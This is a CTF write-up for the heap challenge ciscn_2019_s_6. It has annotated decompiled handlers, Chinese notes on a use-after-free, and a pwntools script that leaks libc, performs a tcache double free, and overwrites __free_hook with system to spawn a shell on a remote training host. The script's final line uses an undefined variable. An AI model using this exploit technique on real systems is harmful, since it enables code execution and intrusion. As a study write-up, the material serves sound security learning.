ciscn_2019_s_6
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
64位保护全开
// Decompiled (IDA-style) listing of the binary's "add" handler: creates one
// 0x18-byte record in heap_addr[heap_number] and fills it from stdin.
// Record layout as used below: +0 pointer to the name buffer, +8 the size
// stored as a 32-bit value, +12 a 12-byte "call" field, +23 forced NUL.
// Returns the stack-protector canary XOR (compiler-generated epilogue).
unsigned __int64 add()
{
int v1; // [rsp+4h] [rbp-3Ch]
void **v2; // [rsp+8h] [rbp-38h]
size_t size[5]; // [rsp+10h] [rbp-30h] BYREF
unsigned __int64 v4; // [rsp+38h] [rbp-8h]
v4 = __readfsqword(0x28u);
// Only the record count is bounded: indices 0..12 (13 records) are accepted.
// The declared capacity of heap_addr is not visible in this listing.
if ( heap_number > 12 )
{
puts("Enough!");
exit(0);
}
v1 = heap_number;
// malloc()'s return value is not checked, here or below.
*((_QWORD *)&heap_addr + v1) = malloc(0x18uLL);
puts("Please input the size of compary's name");
// "%d" reads a signed int into size[0]; no range check follows, so a
// negative or very large value reaches malloc()/read() below unchanged.
__isoc99_scanf("%d", size);
*(_DWORD *)(*((_QWORD *)&heap_addr + heap_number) + 8LL) = size[0];
v2 = (void **)*((_QWORD *)&heap_addr + heap_number);
// Name buffer sized by the user-supplied value (truncated to 32 bits).
*v2 = malloc(LODWORD(size[0]));
puts("please input name:");
// read() may fill the whole buffer and adds no NUL terminator; show()
// later prints this buffer with puts(), relying on whatever byte follows.
read(0, **((void ***)&heap_addr + heap_number), LODWORD(size[0]));
puts("please input compary call:");
// Exactly 12 bytes land at offsets 12..23, then byte 23 is zeroed, so the
// field carries at most 11 bytes of data plus the terminator.
read(0, (void *)(*((_QWORD *)&heap_addr + heap_number) + 12LL), 0xCuLL);
*(_BYTE *)(*((_QWORD *)&heap_addr + heap_number) + 23LL) = 0;
puts("Done!");
++heap_number;
return __readfsqword(0x28u) ^ v4;
}
不限制 size 大小。
// Decompiled "call" handler: frees the name buffer of the record at a
// user-supplied index. Neither the record slot nor the stored name pointer
// is cleared afterwards, so the freed buffer stays reachable through show()
// (use-after-free) and through a second call() on the same index (double free).
unsigned __int64 call()
{
int v1; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v2; // [rsp+8h] [rbp-8h]
v2 = __readfsqword(0x28u);
puts("Please input the index:");
// v1 is used directly as an index into heap_addr; no bounds check is applied.
__isoc99_scanf("%d", &v1);
// Only a non-NULL record slot is required; a record whose name buffer was
// already freed still passes this test.
if ( *((_QWORD *)&heap_addr + v1) )
free(**((void ***)&heap_addr + v1));
// Only the name buffer is released; the 0x18-byte record itself is kept.
puts("You try it!");
puts("Done");
return __readfsqword(0x28u) ^ v2;
}
存在 UAF：free 之后指针未被清空。
// Decompiled "show" handler: prints the name buffer and the 12-byte "call"
// field of the record at a user-supplied index. Because call() never clears
// the stored name pointer, this prints the buffer even after it was freed.
unsigned __int64 show()
{
int v1; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v2; // [rsp+8h] [rbp-8h]
v2 = __readfsqword(0x28u);
puts("Please input the index:");
// Index is taken as-is; no lower/upper bound check.
__isoc99_scanf("%d", &v1);
// Consume the newline left behind by scanf().
getchar();
if ( *((_QWORD *)&heap_addr + v1) )
{
puts("name:");
// Name buffer is not NUL-terminated by add(); puts() reads until a zero byte.
puts(**((const char ***)&heap_addr + v1));
puts("phone:");
// Field at +12; add() zeroes byte 23, which terminates it.
puts((const char *)(*((_QWORD *)&heap_addr + v1) + 12LL));
}
puts("Done!");
return __readfsqword(0x28u) ^ v2;
}
show这里因为uaf也可以直接泄露libc
思路
利用uaf泄露libc,本题部署在libc-2.27,并且是可以使用tcache double free
直接改fd,
再改freehook
-> system
-> free 掉 /bin/sh
# Proof-of-concept script from the writeup above (target libc-2.27, as the
# notes state). The helpers rec/add/dele/show/get_addr_u64/li/freehook/
# system/ia come from the author's Yapack module, which is not shown here;
# their argument conventions are inferred from usage only.
from pwn import*
from Yapack import *
libc=ELF('libc.so.6')
context(os='linux', arch='amd64',log_level='debug')
# Remote target; "./pwn" is the local copy of the binary.
r,elf=rec("node4.buuoj.cn",27734,"./pwn",10)
add(0x420,b'aa',b'b'*0xc)#0
add(0x20,b'aa',b'bb')#1
add(0x20,b'/bin/sh\x00',b'bb')#2
# Free record 0's name, then read it back via show(): the dangling pointer
# left by call() is the UAF described in the notes.
dele(0)
show(0)
# Offsets are specific to the libc-2.27 build mentioned in the notes.
leak=get_addr_u64()-libc.sym['__malloc_hook']-96-0x10
li(leak)
free=freehook(leak)
sys=system(leak)
# Same index freed twice (tcache double free, per the notes).
dele(1)
dele(1)
add(0x20,p64(free),b'bb')
add(0x20,b'aa',b'bb')
add(0x20,p64(sys),b'bb')
dele(2)
#debug()
# NOTE(review): `c` is not defined anywhere in this script; presumably the
# handle `r` returned by rec() was meant — confirm against Yapack's ia().
ia(c)